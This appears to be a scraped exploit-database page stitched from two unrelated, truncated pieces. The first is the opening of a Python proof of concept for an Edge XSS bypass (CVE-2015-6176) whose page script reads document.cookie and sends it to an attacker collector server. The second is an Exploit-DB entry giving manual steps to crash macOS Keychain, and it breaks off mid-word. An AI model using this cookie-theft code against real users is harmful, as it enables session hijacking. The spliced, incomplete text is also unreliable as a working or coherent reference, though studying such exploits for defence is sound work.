# Author: nu11secur1ty
# Date: 2025-07-18
# Vendor: Microsoft
# Software: Microsoft Edge Browser
# Reference: https://www.cve.org/CVERecord?id=CVE-2015-6176
#!/usr/bin/python
# nu11secur1ty CVE-2015-6176
import http.server
import socketserver
import socket
import threading
from urllib import parse
import requests
import datetime
PORT = 8080
COLLECTOR_PORT = 9000
# HTML page with extended XSS exploit that sends lots of info via Image GET
to collector
HTML_CONTENT = b\\\"\\\"\\\"
XSS Edge Bypass PoC
window.onload = function() {
try {
var attackerServer = \\\"http://{LOCAL_IP}:{COLLECTOR_PORT}/collect\\\";
var cookies = document.cookie
Exploit-DB
Apple Mac OSX Keychain - EXC_BAD_ACCESS Denial of Service
exploitdb·2015-08-08
Apple Mac OSX Keychain - EXC_BAD_ACCESS Denial of Service
Apple Mac OSX Keychain - EXC_BAD_ACCESS Denial of Service
---
# Exploit Title: OSX Keychain - EXC_BAD_ACCESS
# Date: 22/07/2015
# Exploit Author: Juan Sacco
# Vendor Homepage: https://www.apple.com
# Software Link: https://www.apple.com/en/downloads/
# Version: 9.0 (55161)
# Tested on: OSX Yosemite 10.10.4
# CVE : None
# History - Reported to [email protected] 20 Jul 2015
# Be careful: Crashing the Keychain will affect the user ability to use
Keychain stored passwords.
# How to reproduce it manually
1. Select a certificate, right click "New certificate preference.."
2. Under "Location or Email address:" add random values +9000
3. Click on Add to conduct the PoC manually
# Technically:
Performing @selector(addCertificatePreference:) from sender NSButton
0x608000148cf0
# Excep
No writeups or analysis indexed.
2017-05-16
Published